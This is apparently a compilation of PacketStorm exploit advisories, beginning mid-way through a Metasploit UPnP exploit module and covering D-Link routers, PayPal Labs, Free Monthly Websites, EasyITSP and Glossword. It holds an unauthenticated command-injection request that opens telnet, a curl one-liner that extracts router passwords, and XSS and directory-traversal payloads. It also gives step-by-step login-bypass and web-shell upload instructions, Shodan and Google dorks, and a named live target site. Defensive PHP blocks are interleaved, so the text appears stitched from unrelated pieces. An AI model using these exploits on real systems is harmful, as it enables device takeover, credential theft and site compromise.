              self.service.deref if self.service.kind_of?(Rex::Service)
              if self.service.kind_of?(Rex::Socket)
                self.service.close
                self.service.stop
              end
              self.service = nil
            rescue ::Exception
            end
          end
        end

        def choose_target
          # If the user specified a target, use that one
          return self.target unless self.target.name =~ /Automatic/

          msearch =
            "M-SEARCH * HTTP/1.1\r\n" +
            "Host:239.255.255.250:1900\r\n" +
            "ST:upnp:rootdevice\r\n" +
            "Man:\"ssdp:discover\"\r\n" +
            "MX:3\r\n\r\n"

          # Fingerprint the service through SSDP
          udp_sock.sendto(msearch, rhost, rport, 0)

          res = nil
          1.upto(5) do
            res,addr,info = udp_sock.recvfrom(65535, 1.0)
            break if res and res =~ /^(Server|Location)/mi
            udp_sock.sendto(msearch, rhost, rport, 0)
          end

          self.targets.each do |t|
            return t if t[:fingerprint] and res =~ t[:fingerprint]
          end

          if res and res.to_s.length > 0
            print_status("No target matches this fingerprint")
            print_status("")
            res.to_s.split("\n").each do |line|
              print_status("  #{line.strip}")
            end
            print_status("")
          else
            print_status("The system #{rhost} did not reply to our M-SEARCH probe")
          end

          fail_with(Exploit::Failure::NoTarget, "No compatible target detected")
        end

        # Accessor for our TCP payload stager
        attr_accessor :service

        # We need an unconnected socket because SSDP replies often come
        # from a different sent port than the one we sent to. This also
        # breaks the standard UDP mixin.
        def configure_socket
          self.udp_sock = Rex::Socket::Udp.create({
            'Context' => {
              'Msf'        => framework,
              'MsfExploit' => self
            }
          })
          add_socket(self.udp_sock)
        end

        #
        # Required since we aren't using the normal mixins
        #
        def rhost
          datastore['RHOST']
        end

        def rport
          datastore['RPORT']
        end

        # Accessor for our UDP socket
        attr_accessor :udp_sock

      end

      Source: PacketStorm
  20. D-Link DIR-600 and DIR-300 suffer insecure cryptographic storage, remote command execution, information disclosure, and insecure password changing vulnerabilities.

      Device Name: DIR-600 / DIR 300 - HW rev B1
      Vendor: D-Link

      ============
      Vulnerable Firmware Releases - DIR-300:
      ============
      Firmware Version : 2.12 - 18.01.2012
      Firmware Version : 2.13 - 07.11.2012

      ============
      Vulnerable Firmware Releases - DIR-600:
      ============
      Firmware-Version : 2.12b02 - 17/01/2012
      Firmware-Version : 2.13b01 - 07/11/2012
      Firmware-Version : 2.14b01 - 22/01/2013

      ============
      Device Description:
      ============
      D-Link® introduces the Wireless 150 Router (DIR-600), which delivers high performance end-to-end wireless connectivity based on 802.11n technology. The DIR-600 provides better wireless coverage and improved speeds over standard 802.11g*. Upgrading your home network to Wireless 150 provides an excellent solution for experiencing better wireless performance while sharing a broadband Internet connection with multiple computers over a secure wireless network.

      Source (dead): http://www.dlink.com/us/en/support/product/dir-600-wireless-n-150-home-r...
      German website: http://www.dlink.de/cs/Satellite?c=TechSupport_C&childpagename=DLinkEuro...

      ============
      Shodan Dorks
      ============
      Shodan search:
      Server: Linux, HTTP/1.1, DIR-300
      Server: Linux, HTTP/1.1, DIR-600

      ============
      Vulnerability Overview:
      ============

      * OS Command Injection (unauthenticated) => Parameter cmd

      The vulnerability is caused by missing access restrictions and missing input validation in the cmd parameter and can be exploited to inject and execute arbitrary shell commands. It is possible to start a telnetd to compromise the device.

      WARNING: You do not need to be authenticated to the device!

      Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/DIR-600-OS-Command-Injectino.png

      starting a telnet server:

      Request:
      POST /command.php HTTP/1.1
      Host: 192.168.178.222
      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
      Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
      Accept-Encoding: gzip, deflate
      Proxy-Connection: keep-alive
      Content-Type: application/x-www-form-urlencoded; charset=UTF-8
      Referer: http://192.168.178.222/
      Content-Length: 15
      Cookie: uid=hfaiGzkB4z
      Pragma: no-cache
      Cache-Control: no-cache

      cmd=telnetd;

      You do not need to be authenticated to the device for executing the malicious commands. You could prepare the whole request and execute it without any authentication details. For example you could start the telnetd on other ports and interfaces. So with this you are able to get a full shell *h00ray*

      Nmap Scan after starting the telnetd:

      Nmap scan report for 192.168.178.222
      Host is up (0.022s latency).
      Not shown: 995 closed ports
      PORT   STATE    SERVICE VERSION
      1/tcp  filtered tcpmux
      23/tcp open     telnet  BusyBox telnetd 1.14.1 <<==!!!
      <snip>

      Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/DIR-600-OS-Command-Injection-telnetd.png

      * Information disclosure:

      Nice server banner to detect this type of devices easily:
      Server: Linux, HTTP/1.1, DIR-300 Ver 2.12
      Server: Linux, HTTP/1.1, DIR-600 Ver 2.12

      * For changing the current password there is no request for the current password

      With this vulnerability an attacker is able to change the current password without knowing it. The attacker needs access to an authenticated browser.

      * Insecure Cryptographic Storage:

      There is no password hashing implemented and so it is saved in plain text on the system:

      # cat var/passwd
      "admin" "test" "0"

      Positive Technologies released an advisory in 2011 and D-Link fixed this issue: http://en.securitylab.ru/lab/PT-2011-30
      With the current version of the firmware the passwords are stored again in plaintext.

      If you combine the plaintext credential vulnerability with the unauthenticated OS command injection vulnerability you will get the following one liner to extract the admin password from every vulnerable device:

      root@bt:~# curl --data "cmd=cat /var/passwd" http://<Target IP>/command.php
      "admin" "THESECRETPASS" "0"
      root@bt:~#

      * Information Disclosure:

      Detailed device information including Model Name, Hardware Version, Linux Kernel, Firmware version, Language and MAC Addresses are available via the network.

      Request:
      http://Target-IP/DevInfo.txt
      or try to access version.txt and have a look at the html source

      Response:
      HTTP/1.1 200 OK
      Server: Linux, HTTP/1.1, DIR-600 Ver 2.14
      Date: Fri, 31 Dec 1999 18:04:13 GMT
      Content-Length: 267

      Firmware External Version: V2.14
      Firmware Internal Version: d1mg
      Model Name: DIR-600
      Hardware Version: Bx
      WLAN Domain: 826
      Kernel: 2.6.33.2
      Language: en
      Graphcal Authentication: Disable
      LAN MAC: <snip>
      WAN MAC: <snip>
      WLAN MAC: <snip>

      These details are available without authentication.

      * Local path disclosure

      Every piece of information is interesting for the attacker. With this we will get some more details about the operating system and its paths.

      Request:
      http://<IP>/router_info.xml

      Response:
      HTTP/1.1 200 OK
      Server: Linux, HTTP/1.1, DIR-300 Ver 2.12
      Date: Sat, 01 Jan 2000 21:22:43 GMT
      Content-Type: text/xml
      Content-Length: 49

      EPHP: dophp(load,/htdocs/widget/.xml) ERROR (-1)

      * Stored XSS via WLAN Assistant and Version Details

      Injecting scripts into the parameter SSID reveals that this parameter is not properly validated for malicious input.

      => Parameter: SSID

      The injected code gets executed if you try to access the file version.txt. For this you do not need to be authenticated
      http://Target-IP/version.txt

      ============
      Solution
      ============
      No known solution available.

      ============
      Credits
      ============
      The vulnerability was discovered by Michael Messner
      Mail: devnull#at#s3cur1ty#dot#de
      Web: http://www.s3cur1ty.de/m1adv2013-003
      Video: http://www.s3cur1ty.de/home-network-horror-days

      ============
      Time Line:
      ============
      14.12.2012 - discovered vulnerability
      14.12.2012 - contacted D-Link with the new vulnerability details via web interface
      20.12.2012 - contacted Heise Security with details and Heisec forwarded the details to D-Link
      21.12.2012 - D-Link responded that they will check the findings *h00ray*
      11.01.2013 - requested status update
      25.01.2013 - requested status update
      25.01.2013 - D-Link responded that this is a security problem from the user and/or browser and they will not provide a fix. Quite interesting but ok ...
      25.01.2013 - I gave more details and as much input as possible so they can evaluate the vulnerabilities better
      04.02.2013 - no more responses from D-Link, public release

      =====================
      Advisory end
      =====================

      Source: PacketStorm
  21. PayPal.com suffered from a persistent script injection vulnerability. Title: ====== Paypal Bug Bounty #20 - Persistent Web Vulnerabilities Date: ===== 2013-01-25 References: =========== http://www.vulnerability-lab.com/get_content.php?id=682 PayPal UID: fxv444khi VL-ID: ===== 682 Common Vulnerability Scoring System: ==================================== 3.5 Introduction: ============= PayPal is a global e-commerce business allowing payments and money transfers to be made through the Internet. Online money transfers serve as electronic alternatives to paying with traditional paper methods, such as checks and money orders. Originally, a PayPal account could be funded with an electronic debit from a bank account or by a credit card at the payer s choice. But some time in 2010 or early 2011, PayPal began to require a verified bank account after the account holder exceeded a predetermined spending limit. After that point, PayPal will attempt to take funds for a purchase from funding sources according to a specified funding hierarchy. If you set one of the funding sources as Primary, it will default to that, within that level of the hierarchy (for example, if your credit card ending in 4567 is set as the Primary over 1234, it will still attempt to pay money out of your PayPal balance, before it attempts to charge your credit card). The funding hierarchy is a balance in the PayPal account; a PayPal credit account, PayPal Extras, PayPal SmartConnect, PayPal Extras Master Card or Bill Me Later (if selected as primary funding source) (It can bypass the Balance); a verified bank account; other funding sources, such as non-PayPal credit cards. The recipient of a PayPal transfer can either request a check from PayPal, establish their own PayPal deposit account or request a transfer to their bank account. PayPal is an acquirer, performing payment processing for online vendors, auction sites, and other commercial users, for which it charges a fee. 
It may also charge a fee for receiving money, proportional to the amount received. The fees depend on the currency used, the payment option used, the country of the sender, the country of the recipient, the amount sent and the recipient s account type. In addition, eBay purchases made by credit card through PayPal may incur extra fees if the buyer and seller use different currencies. On October 3, 2002, PayPal became a wholly owned subsidiary of eBay. Its corporate headquarters are in San Jose, California, United States at eBay s North First Street satellite office campus. The company also has significant operations in Omaha, Nebraska, Scottsdale, Arizona, and Austin, Texas, in the United States, Chennai, Dublin, Kleinmachnow (near Berlin) and Tel Aviv. As of July 2007, across Europe, PayPal also operates as a Luxembourg-based bank. On March 17, 2010, PayPal entered into an agreement with China UnionPay (CUP), China s bankcard association, to allow Chinese consumers to use PayPal to shop online.PayPal is planning to expand its workforce in Asia to 2,000 by the end of the year 2010. Between December 4ñ9, 2010, PayPal services were attacked in a series of denial-of-service attacks organized by Anonymous in retaliation for PayPal s decision to freeze the account of WikiLeaks citing terms of use violations over the publication of leaked US diplomatic cables. (Copy of the Homepage: www.paypal.com) [http://en.wikipedia.org/wiki/PayPal] Abstract: ========= The Vulnerability Laboratory Research Team discovered a Web Vulnerability in Paypal Labs Fundraising Widget Web Application. 
Report-Timeline: ================ 2012-08-13: Researcher Notification & Coordination 2012-08-14: Vendor Notification 2012-09-13: Vendor Response/Feedback 2013-01-12: Vendor Fix/Patch (PayPal Inc) 2013-01-25: Public Disclosure Status: ======== Published Exploitation-Technique: ======================= Remote Severity: ========= Medium Details: ======== Multiple persistent input validation vulnerabilities are detected in Paypal Labs Fundraising Widget. The bugs allow remote attackers to implement/inject malicious script code on the application side (persistent). The persistent vulnerabilities are located in the Generate Widgets module with the bound vulnerable your name, your website, image url and supporters parameter listing. Attackers can inject own malicious script code as name, website url, image url or as supporter link to generate evil fundraising widgets. The execution of the script code occurs in the main listing out of the account index or the generated widget file output listing. Exploitation requires low user interaction or low privileged application user account. Successful exploitation of the vulnerability leads to persistent session hijacking (admin/mod/customer), account steal via persistent web attack or stable (persistent) context manipulation. Vulnerable Service(s): [+] Fundraising Widgets [https://giving.paypallabs.com/] Vulnerable Module(s): [+] Generate Widgets Vulnerable Parameter(s): [+] your name [+] your website [+] image url [+] supporters Affected Section(s): [+] Giving PaypalLabs Account Index [+] Generated widget output file Proof of Concept: ================= The persistent web vulnerabilities can be exploited by remote attackers with low privileged application user account and with low or medium required user inter action. For demonstration or reproduce ... 
Session: https://giving.paypallabs.com/authenticate/myaccount?token=HA-CYR26UHWRK8CS
Time: 17:58 - 18:10 (EU) 2012-08-13

Review: Your giving widgets - Account Index

<tr>
<td height="20" width="20"><img src="myaccount-Dateien/spacer.gif" height="1" width="20"></td>
<td align="left" height="20" valign="top" width="10"><img src="myaccount-Dateien/dot.gif" height="7" width="2"></td>
<td class="gap" title="-1' " align="left" height="20" width="110"><[PERSISTENT INJECTED SCRIPT CODE!]")' <"=""><a href="/authenticate/view_campaign?campaign=38284">-1' "><[PERSISTENT INJECTED SCRIPT CODE!]") <</a></td>
<td width="20" height="20"><img src="/images/spacer.gif" width="20" height="1" /></td>
</tr>

Review: Review Badge - Link

<a name='b_60df8340c78b012fbb8a000d60d4c902'></a><object type='application/x-shockwave-flash' data='https://giving.paypallabs.com/flash/badge.swf' width='205' height='350' id='badge60df8340c78b012fbb8a000d60d4c902' align='middle'>
<param name='allowScriptAccess' value='always' />
<param name='allowNetworking' value='all' />
<param name='movie' value='https://giving.paypallabs.com/flash/badge.swf' />
<param name='quality' value='high' />
<param name='bgcolor' value='#FFFFFF' />
<param name='wmode' value='transparent' />
<param name='FlashVars' value='Id=60df8340c78b012fbb8a000d60d4c902'/>
<embed src='https://giving.paypallabs.com/flash/badge.swf' FlashVars='Id=60df8340c78b012fbb8a000d60d4c902' quality='high' bgcolor='#FFFFFF' wmode='transparent' width='205' height='350' Id='badge60df8340c78b012fbb8a000d60d4c902' align='middle' allowScriptAccess='always' allowNetworking='all' type='application/x-shockwave-flash' pluginspage='http://www.macromedia.com/go/getflashplayer'></embed>
</object>

Risk:
=====
The security risk of the persistent script code inject vulnerability is estimated as medium(+).
Credits:
========
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@vulnerability-lab.com)

Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register
Contact: admin@vulnerability-lab.com - support@vulnerability-lab.com - research@vulnerability-lab.com
Section: video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission.

Copyright © 2012 | Vulnerability Laboratory

--
VULNERABILITY RESEARCH LABORATORY
LABORATORY RESEARCH TEAM
CONTACT: research@vulnerability-lab.com

Source: PacketStorm
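The advisory above names four widget parameters (your name, your website, image url, supporters) that land unencoded in the account-index table and in the generated widget. As an added example (not PayPal Labs code), this is how a server-side renderer for that account-index row would neutralise those values: context-aware HTML encoding for the name, a scheme allowlist for the two URL fields, and an integer cast for the campaign id. The function and field names are assumed.

```php
<?php
// Added example, not PayPal Labs code: render the "Your giving widgets" account-index
// row so that attacker-controlled name / website / image-url values stay in their
// HTML context. Field names follow the advisory; everything else is assumed.
declare(strict_types=1);

// Encode for HTML text nodes and for double-quoted attribute values.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Accept only absolute http(s) URLs. javascript:, data:, or quote-laden relative junk
// yields an empty string, and the caller then emits no link/img at all.
function safeUrl(string $url): string
{
    $url   = trim($url);
    $parts = parse_url($url);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return '';
    }
    if (!in_array(strtolower($parts['scheme']), ['http', 'https'], true)) {
        return '';
    }
    return $url;
}

function renderWidgetRow(int $campaignId, string $name, string $website, string $imageUrl): string
{
    $site = safeUrl($website);
    $img  = safeUrl($imageUrl);

    $row  = '<tr>';
    // The same user string appears in two contexts (title attribute and link text);
    // both get h(), and the campaign id is an int, never echoed raw from the request.
    $row .= '<td class="gap" title="' . h($name) . '">'
          . '<a href="/authenticate/view_campaign?campaign=' . $campaignId . '">' . h($name) . '</a></td>';
    $row .= '<td>' . ($site !== '' ? '<a href="' . h($site) . '" rel="noopener">' . h($site) . '</a>' : '') . '</td>';
    $row .= '<td>' . ($img !== '' ? '<img src="' . h($img) . '" alt="">' : '') . '</td>';
    return $row . '</tr>';
}

// Constructed sample input of the shape the advisory redacts as "[PERSISTENT INJECTED SCRIPT CODE!]".
$name = "-1' \"><script>alert(1)</script>";
echo renderWidgetRow(38284, $name, 'javascript:alert(1)', 'https://example.org/logo.png'), PHP_EOL;
// The name is emitted as &lt;script&gt;...; the javascript: website URL produces an empty cell.
```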
22. Free Monthly Websites version 2.0 suffers from administrative login bypass and remote shell upload vulnerabilities.

==========================================================================================
Free Monthly Websites 2.0 Multiple Vulnerabilities
==========================================================================================
:----------------------------------------------------------------------------------------------------------------------------------:
: # Exploit Title : Free Monthly Websites 2.0 Multiple Vulnerabilities
: # Date : 04 February 2013
: # Author : X-Cisadane
: # Vendor : http://www.freemonthlywebsites2.com/
: # Download : http://www.freemonthlywebsites2.com/downloads/fmw_oto/websites/Free_Monthly_Websites_50_Custom_Websites_MPW7199.zip
: # Version : 2.0
: # Category : Web Applications
: # Vulnerability : Admin Login Bypass and Shell Upload Vulnerability
: # Tested On : Google Chrome 24.0.1312.52 m (Windows XP SP 3 32-Bit English)
: # Greetz to : X-Code, Borneo Crew, Depok Cyber, Explore Crew, CodeNesia, Bogor-H, Jakarta Anonymous Club and Ngobas
:----------------------------------------------------------------------------------------------------------------------------------:

DORKS
=====
inurl:/index_ebay.php "Powered by: Resell Rights Fortune"
"Generating Traffic to Your Site with Keyword Based Articles"
Powered By: Free Monthly Websites 2.0

Proof of Concept
================
[ 1 ] Admin Login Bypass

Vulnerable page http://target.com/[path]/admin/index.php
Line
40 <form name="frm" action="file_io.php" method="post" onSubmit="return chk()">
41 <input type="hidden" name="do_type" value="admin_settings_read">

Vulnerable page http://target.com/[path]/admin/login.php
Line
40 <form name="frm" action="file_io.php" method="post" onSubmit="return chk()">
41 <input type="hidden" name="do_type" value="admin_settings_read">

Vulnerable page http://target.com/[path]/admin/file_io.php
Line
14 if($_REQUEST[do_type]=="admin_settings_read")
15 {
16 $filename="settings/admin_settings.txt";
17
18 if(!$handle = fopen($filename, 'r'))
19 {
20 echo "Cannot open file ($filename)";
21 exit;
22 }
23 $contents = fread($handle, filesize($filename));
24 fclose($handle);
25 $argument_arr=explode("#_1_#",$contents);
26
27 if($argument_arr[0]==$_REQUEST[username] && $argument_arr[1]==$_REQUEST[pass])
28 {
29 $_SESSION[logged_in]=true;
30 header("location:welcome.php");

Based at line 16 we know that the Admin Username and Password are stored in admin_settings.txt, NOT in a Database! So when we login into the Admin Panel, file_io.php will read the valid Username and Password from admin_settings.txt. If you do a direct access to the file admin_settings.txt, the result is 403 Permission Denied: You do not have permission for this request /admin/settings/admin_settings.txt
Pic : http://i48.tinypic.com/2gvlwt4.png

So... How to Bypass Admin Login Page?

1st. Open the Admin Login Page : http://target.com/[path]/admin/index.php
Live Target : http://www.massmoneywebsites.com/admin/

2nd. Inspect Element on the login Form.
Pic : http://i47.tinypic.com/2r5ddp1.png

3rd. Change from
<form name="frm" action="file_io.php" method="post" onsubmit="return chk()"></form>
<input type="hidden" name="do_type" value="admin_settings_read">
CHANGE TO
<form name="frm" action="file_io.php" method="post" onsubmit="return chk()"></form>
<input type="text" name="do_type" value="admin_settings_write">
Then press ENTER (please see pic).
Pic : http://i49.tinypic.com/351z3ib.png

4th. You will see a Login Failed Page : >> You need to login in to access that page <<
Pic : http://i50.tinypic.com/33ws8jb.png
Never mind about that, just click 'Login Button' and VOILA you get Admin Access!
Pic : http://i45.tinypic.com/jzwpea.png

----------------------------------------
[ 2 ] Upload PHP Backdoor or PHP Shell

This vulnerability works on the PREMIUM VERSION of Free Monthly Websites 2.0

So... How to Upload Backdoor (PHP Shell)?

1st. Go to Add/Remove Navigation Page.
http://target.com/[path]/admin/add_main_pages.php
Live Target : http://www.massmoneywebsites.com/admin/add_main_pages.php

2nd. Enter a Name For Your New Navigation Page That You Wish To Add: dwi.php
And click Add New Navigation Page.
Pic : http://i45.tinypic.com/vigzsp.png

3rd. Still at the same page, scroll down the page until you see this section : Sort Your Page Buttons/Links.
Pic : http://i46.tinypic.com/1040oxg.png
Change FROM dwi.php.html TO /dwi.php then Click Sort Navigation Pages.
Pic : http://i49.tinypic.com/24ec1l0.jpg

4th. Go to Edit Navigation Page.
http://www.massmoneywebsites.com/admin/edit_main_pages.php
Please Select a Page To Edit: dwi.php.html <--- Select that page.

5th. Inspect element on dwi.php.html
Pic : http://i50.tinypic.com/29pq1ix.png
Change FROM
<option value="dwi.php.html" selected="">dwi.php.html</option>
To
<option value="dwi.php" selected="">dwi.php</option>
Pic : http://i47.tinypic.com/wtb0j6.png

6th. Enter A Page Title As You Would Like It To Be Seen. Fill with dwi.php
URL For This Page: main_pages/dwi.php
Use the 'URL For This Page' field above: [Tick]
Display This Page in Left Vertical Site Navigation: [Tick]
Display This Page in Top Horizontal Site Navigation Buttons: [Tick]
Pic : http://i46.tinypic.com/1zebnle.png

7th. Still at the same page, scroll down the page until you see this section : Enter Content For Your Page:
Click SOURCE button
Press Enter Twice at the First Line then Paste your PHP Backdoor/PHP Shell below. And Press Enter Twice at the Last Line.
*Please see the 2 Pictures below if you don't understand
Pic 1 : http://i49.tinypic.com/1zlzxq0.png
Pic 2 : http://i48.tinypic.com/291kc9h.png
If you wanna do this, please Remove Your Backdoor Password.
Click Save Edited Navigation Page.

8th. After this message >> Data saved successfully << Appeared, Visit the Home Page and you will see the Backdoor Page
Pic : http://i49.tinypic.com/4rt1g4.png

//I'm sorry My English was poor

Source: PacketStorm
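The bypass above works because file_io.php lets the client pick the branch via the hidden do_type field, compares plaintext credentials with ==, and (as the post shows) reaches the settings-write path without checking the session first. As an added example, not the vendor's code, here is a hardened stand-in for that dispatcher: the login form can only trigger the login branch, every state-changing branch verifies the session itself, and the stored secret is a password_hash() value. The action name, file layout and the 12-character minimum are assumptions; the "#_1_#" separator and the settings path are the post's.

```php
<?php
// Added example, not Free Monthly Websites code: a hardened replacement for the
// do_type dispatcher in admin/file_io.php. Assumes settings/admin_settings.txt still
// holds "username#_1_#secret", but the secret is now a password_hash() string.
declare(strict_types=1);
session_start();

const SETTINGS_FILE = __DIR__ . '/settings/admin_settings.txt';
const SEP = '#_1_#';

function readSettings(): array
{
    $contents = @file_get_contents(SETTINGS_FILE);
    if ($contents === false) {
        http_response_code(500);
        exit('Cannot open settings file');
    }
    [$user, $hash] = array_pad(explode(SEP, $contents, 2), 2, '');
    return ['user' => $user, 'hash' => trim($hash)];
}

function requireLogin(): void
{
    if (empty($_SESSION['logged_in'])) {
        http_response_code(403);
        exit('You need to login in to access that page');
    }
}

// The client no longer switches between read and write through a hidden field: the
// login form always posts action=login, and the write branch checks the session before
// doing anything, so renaming the field to admin_settings_write gains nothing.
$action = $_POST['action'] ?? '';
switch ($action) {
    case 'login':
        $s      = readSettings();
        $userOk = hash_equals($s['user'], (string)($_POST['username'] ?? ''));
        $passOk = password_verify((string)($_POST['pass'] ?? ''), $s['hash']);   // false on empty/garbage hash
        if ($userOk && $passOk) {
            session_regenerate_id(true);          // new session id on privilege change
            $_SESSION['logged_in'] = true;
            header('Location: welcome.php');
            exit;
        }
        http_response_code(401);
        exit('Login failed');

    case 'admin_settings_write':
        requireLogin();                           // only an authenticated admin may rotate credentials
        $newUser = (string)($_POST['username'] ?? '');
        $newPass = (string)($_POST['pass'] ?? '');
        if ($newUser === '' || strpos($newUser, SEP) !== false || strlen($newPass) < 12) {
            http_response_code(400);
            exit('Invalid settings');
        }
        $data = $newUser . SEP . password_hash($newPass, PASSWORD_DEFAULT);
        file_put_contents(SETTINGS_FILE, $data, LOCK_EX);
        chmod(SETTINGS_FILE, 0600);               // readable by the web user only, on top of the 403 rule
        exit('Data saved successfully');

    default:
        http_response_code(400);
        exit('Unknown action');
}
```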
23. EasyITSP versions 2.0.7 and below suffer from a directory traversal vulnerability.

Directory Traversal - EasyITSP <= 2.0.7
EasyITSP - Telephone System VoIP
http://blaszczakm.blogspot.com
Michal Blaszczak

Search/Read/Delete filetype *.txt
Search/Play/Delete filetype *.wav - Voicemail

file: voicemail.php line: 220
foreach (glob("$vmdir/$_SESSION[phone]/$vmfolder/*.txt") as $filename) {

file: voicemail.php line: 186 - 190
if(isset($_GET['folder'])) {
    $vmfolder = $_GET['folder'];
} else {
    $vmfolder = "INBOX";
}

POC:
http:///easyitsp/WEB/customer/voicemail.php?currentpage=phones&folder=../../

Michał Błaszczak
http://blaszczakm.blogspot.com

Source: PacketStorm
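The quoted voicemail.php lines pass $_GET['folder'] straight into the glob() pattern, so "../../" walks out of the caller's mailbox. As an added example, not EasyITSP code, this helper shows the two-layer fix: an allowlist of folder names (the standard Asterisk voicemail folders are assumed here) and a realpath() containment check as defence in depth, demonstrated against a constructed mailbox under the temp directory.

```php
<?php
// Added example, not EasyITSP code: constrain the voicemail "folder" parameter so the
// glob() in voicemail.php can never leave the caller's own mailbox. Layout assumed to be
// $vmdir/<phone>/<folder>/ as in the advisory's quoted code.
declare(strict_types=1);

// Assumed allowlist: Asterisk's default voicemail folder names.
const ALLOWED_FOLDERS = ['INBOX', 'Old', 'Work', 'Family', 'Friends'];

function voicemailFolder(string $vmdir, string $phone, ?string $requested): string
{
    // 1. Allowlist: anything that is not a known folder name ("../../" included) falls back to INBOX.
    $folder = in_array($requested ?? '', ALLOWED_FOLDERS, true) ? $requested : 'INBOX';

    // 2. The phone id comes from the session, but is validated anyway: digits only.
    if (!preg_match('/^\d{1,15}$/', $phone)) {
        throw new InvalidArgumentException('invalid mailbox id');
    }

    // 3. Defence in depth: canonicalise and confirm the result still lies below $vmdir.
    $base = realpath($vmdir);
    $path = realpath("$vmdir/$phone/$folder");
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        throw new RuntimeException('folder does not exist or lies outside the voicemail root');
    }
    return $path;
}

// Constructed demo mailbox: one message in INBOX, no "Old" folder.
$vmdir = sys_get_temp_dir() . '/vm_demo_' . bin2hex(random_bytes(4));
mkdir("$vmdir/1001/INBOX", 0700, true);
file_put_contents("$vmdir/1001/INBOX/msg0000.txt", "[message]\ncallerid=\"Demo\" <1002>\n");

foreach (['INBOX', '../../', 'Old'] as $candidate) {
    try {
        $dir = voicemailFolder($vmdir, '1001', $candidate);
        printf("%-8s -> %s (%d .txt files)\n", $candidate, $dir, count(glob("$dir/*.txt")));
    } catch (Exception $e) {
        printf("%-8s -> rejected: %s\n", $candidate, $e->getMessage());
    }
}
// INBOX resolves to the mailbox; "../../" is not an allowed name and falls back to INBOX;
// "Old" is an allowed name but does not exist, so the realpath check rejects it.
```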
24. Glossword version 1.8.12 suffers from database backup disclosure, cross site request forgery, cross site scripting, and remote shell upload vulnerabilities.

===================================================
Vulnerable Software: Glossword 1.8.12
Tested version: Glossword 1.8.12
Download: http://sourceforge.net/projects/glossword/files/glossword/1.8.12/
Vulns: XSS && Database Backup Disclosure && CSRF && Shell upload.
Dork: Powered by Glossword 1.8.12
===================================================
Tested On:
Debian squeeze 6.0.6
Server version: Apache/2.2.16 (Debian)
Apache traffic server 3.2.0
MYSQL: 5.1.66-0+squeeze1
PHP 5.3.3-7+squeeze14 with Suhosin-Patch (cli) (built: Aug 6 2012 20:08:59)
Copyright (c) 1997-2009 The PHP Group
Zend Engine v2.3.0, Copyright (c) 1998-2010 Zend Technologies
with Suhosin v0.9.32.1, Copyright (c) 2007-2010, by SektionEins GmbH
===================================================
About vulns:

XSS
http://hacker1.own/glosslatest/glossword/1.8/gw_admin.php?a="><script>alert(1);</script>&t=settings
===================================================
Database Backup disclosure:

root@debian:/etc/apache2/htdocs/hacker1/glosslatest/glossword/1.8/gw_temp/gw_export/sql_backup_2013-02Feb-03# grep 'umask' /etc/pam.d/common-session
session optional pam_umask.so umask=0067
root@debian:/etc/apache2/htdocs/hacker1/glosslatest/glossword/1.8/gw_temp/gw_export/sql_backup_2013-02Feb-03# umask -S
u=rwx,g=x,o=
# NOTE 1: Notice database backups chmod'ed to 777 by script #
# NOTICE 2: BELOW database backups is accessible via HTTP REQUESTS #
root@debian:/etc/apache2/htdocs/hacker1/glosslatest/glossword/1.8/gw_temp/gw_export/sql_backup_2013-02Feb-03# ls -liash
total 1.1M
65345 4.0K drwxrwxrwx 2 hacker1user hacker1user 4.0K Feb 3 08:41 .
60499 4.0K drwxr-xr-x 3 hacker1user hacker1user 4.0K Feb 3 08:40 ..
65347 68K -rwxrwxrwx 1 hacker1user hacker1user 64K Feb 3 08:40 backup_gwnew_abbr_phrase.sql
65346 12K -rwxrwxrwx 1 hacker1user hacker1user 9.8K Feb 3 08:40 backup_gwnew_abbr.sql
65367 4.0K -rwxrwxrwx 1 hacker1user hacker1user 402 Feb 3 08:40 backup_gwnew_auth_restore.sql
65359 4.0K -rwxrwxrwx 1 hacker1user hacker1user 304 Feb 3 08:40 backup_gwnew_captcha.sql
65350 4.0K -rwxrwxrwx 1 hacker1user hacker1user 1.3K Feb 3 08:40 backup_gwnew_component_actions.sql
65349 8.0K -rwxrwxrwx 1 hacker1user hacker1user 6.2K Feb 3 08:40 backup_gwnew_component_map.sql
65348 4.0K -rwxrwxrwx 1 hacker1user hacker1user 1.7K Feb 3 08:40 backup_gwnew_component.sql
65365 4.0K -rwxrwxrwx 1 hacker1user hacker1user 1.5K Feb 3 08:40 backup_gwnew_custom_az_profiles.sql
65364 36K -rwxrwxrwx 1 hacker1user hacker1user 33K Feb 3 08:40 backup_gwnew_custom_az.sql
65368 240K -rwxrwxrwx 1 hacker1user hacker1user 234K Feb 3 08:41 backup_gwnew_dict_example.sql
